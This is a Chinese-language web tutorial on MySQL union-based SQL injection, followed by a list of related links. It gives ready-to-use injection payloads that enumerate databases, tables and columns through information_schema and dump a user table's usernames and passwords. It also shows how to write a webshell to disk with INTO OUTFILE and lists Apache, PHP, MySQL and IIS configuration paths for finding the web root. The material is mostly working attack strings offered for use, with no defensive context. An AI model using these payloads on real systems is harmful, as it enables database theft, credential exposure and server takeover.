mysql注入找路径_MySQL注入(示例代码)
-------------------------------------------------------------------------------------------------------------
MYSQL数据库的注入相对于MSSQL来说就简单的多了。常搭配的脚本也是只有
PHP,JSP等。
我们今天主要以MYSQL5.0+版本为主。
函数: database(),user(),version()concat(),group_concat(),hex(),unhex()
Unhex(hex(user())
Load_file(), into outfile ..
MYSQL注入主要是利用他的一个虚拟库:information_schema
Huc数据:users username,paaswrod
Select Column_name from information_schema.columns where table_name=’users’and table_schema=’huc’
Information_schema这个数据库下有三个表,tables,columns,schemata分别存放了各个数据库的,表名、列名、数据库名。
MYSQL 这个数据库存下的user表下的,host,user,password字段存放了数据库的所有主机地址、帐号和密码
注入方法和我们以前的access数据库差不多,只是利用的表不一样。
1:确定字段:order by N
2:联合查询:union select
3:爆数据库:
concat(database(),0x3a,user(),0x3a,version())
And 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata
可以实现跨库查询。
4:爆表:
and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()—
bumen,diaocha,iplist,ipone,leibie,schoolinfo,user
5:爆字段:[user表]
and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 0x75736572
and table_schema=database()—
id,xinmin,yonhumin,mima,bumen,xueke,yesorno,xinbie,power
6:爆内容:
And 1=2 union select 1,group_concat(xinmin,0x3a,yonhumin,0x3a,mima),3 from user—
And 1=2 union select 1,concat(yonhumin),3 from user limit 0,1—
7:利用Into outfile导出一句话
利用条件:
1:首先要知道网站的物理路径。
2:网站目录要有写的权限。
3:数据库帐号权限要有into outfile的权限
4: 必须没有单引号
And 1=2 union selec 1,’一句话的16进制’,3 into outfile‘网站物理路径’—
Windows iis6.0
c:\\windows\\system32\\inetsrv\\MetaBase.xml可以获取网站配置信息了
apache:
如果采用RPM包安装,安装路径应在/etc/httpd目录下
apache配置文件:/etc/httpd/conf/httpd.conf
Apache模块路径:/usr/sbin/apachectl
web目录:/var/www/html
如果采用源代码安装,一般默认安装在/usr/local/apache2目录下
php:
如果采用RPM包安装,安装路径应在/etc/目录下
php的配置文件:/etc/php.ini
如果采用源代码安装,一般默认安装在/usr/local/lib目录下
php配置文件: /usr/local/lib/php.ini
或/usr/local/php/etc/php.ini
mysql:
如果采用RPM包安装,安装路径应在/usr/share/mysql目录下
mysqldump文件位置:/usr/bin/mysqldump
mysqli配置文件:
/etc/my.cnf或/usr/share/mysql/my.cnf
mysql数据目录在/var/lib/mysql目录下
如果采用源代码安装,一般默认安装在/usr/local/mysql目录下
本次mysql注入讲解:Snow狼
QQ:2942953950
群号码:582103166
官方网站:http://shenwolf.wap.zhanqunabc.cn/
谢谢观看
mysql注入找路径_MySQL注入(示例代码)相关推荐
- mysql注入技巧原理_MySQL注入技巧总结
0x00 介绍 以下所有技巧都只在mysql适用,因为它太灵活了. 0x01 MYSQl灵活的语法 1 MySQL语法以及认证绕过 注释符: #,-- X(X为任意字符)/*(MySQL-5.1);% ...
- mysql注入漏洞语句_mysql注入sleep语句引发的拒绝服务
2012-2-15 9:26 Wednesdaymysql注入sleep语句引发的拒绝服务 mysql存在注入,并且注入的sleep语句如果传入一个足够大的参数,比如:sleep(9999999999 ...
- mysql注入写一句话_Mysql注入root权限直接写一句话马
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示:大家不要乱来 http://localhost/pentest/sql/sql_injection_get.php?id=1 发现是root权 ...
- mysql到pg怎么高效_干货 | Debezium实现Mysql到Elasticsearch高效实时同步(示例代码)
题记 来自Elasticsearch中文社区的问题-- MySQL中表无唯一递增字段,也无唯一递增时间字段,该怎么使用logstash实现MySQL实时增量导数据到es中? logstash和kafk ...
- mysql更改可执行文件路径_Mysql 服务 1067 错误 的解决方法:修改mysql可执行文件路径...
今天遇到mysql服务1067错误的问题,设置使用系统账户也无法启动mysql,后面认证看了系统的配置信息,发现启动文件也就是mysql安装路径是之前的(也说明之前安装mysql,没去卸载直接安装新的 ...
- mysql数据库保存图片路径_mysql数据库怎么存图片路径
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],&q ...
- mysql 设置数据库路径_MySQL数据库之更改Mysql数据库存储位置的具体步骤
本文主要向大家介绍了MySQL数据库之更改Mysql数据库存储位置的具体步骤 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助. 一.首先把mysql的服务先停掉. 二.更改MySQ ...
- mysql的游标处理_MySQL存储过程 游标 错误处理的示例代码
MySQL存储过程 游标 错误处理的示例代码--set_account_data 重新生成用户编号 BEGIN DECLARE temp_id INT(8); /*用户id*/ DECLARE tem ...
- mysql注入报错函数_MySQL注入常用函数
注入的分类 仁者见仁,智者见智. 基于从服务器接收到的响应 ▲基于错误的 SQL 注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL 盲注 •基于布尔 SQL 盲注 •基于时间的 SQL 盲注 •基于报错 ...
最新文章
- 图解 Attention(完整版)!
- 北京发自动驾驶车辆考试大纲 难度堪比普通人考驾照
- Spring-BeanFactory源码分析
- Java虚拟机-内存分配策略
- TempDB 中表变量和局部临时表的对比
- ijkplayer中遇到的问题汇总
- javascript释放对象_一文深入理解JavaScript如何运作
- jpa的好伙伴QueryDSL快速入门
- 还在苦恼如何查看微信共同好友吗?用Python轻松搞定
- 自抗扰控制(ADRC)仿真系统(matlab/simulink)的搭建
- Pandas 学习笔记二
- 理工专业单身男终极把妹大法
- 贝叶斯信念网络简介以及算法整理笔记
- 剑气纵横-autojs动画
- Mysql InnoDB 的锁机制
- 如何提高CSDN博客排名
- 苹果澄清:iOS14.5不能设置默认音乐播放器
- 物联无线自动窗帘:窗帘收放更自如-智能家居
- ios kb转m_超圣iOS下载
- Ubuntu18.04使用Systemback制作系统镜像并还原(亲测)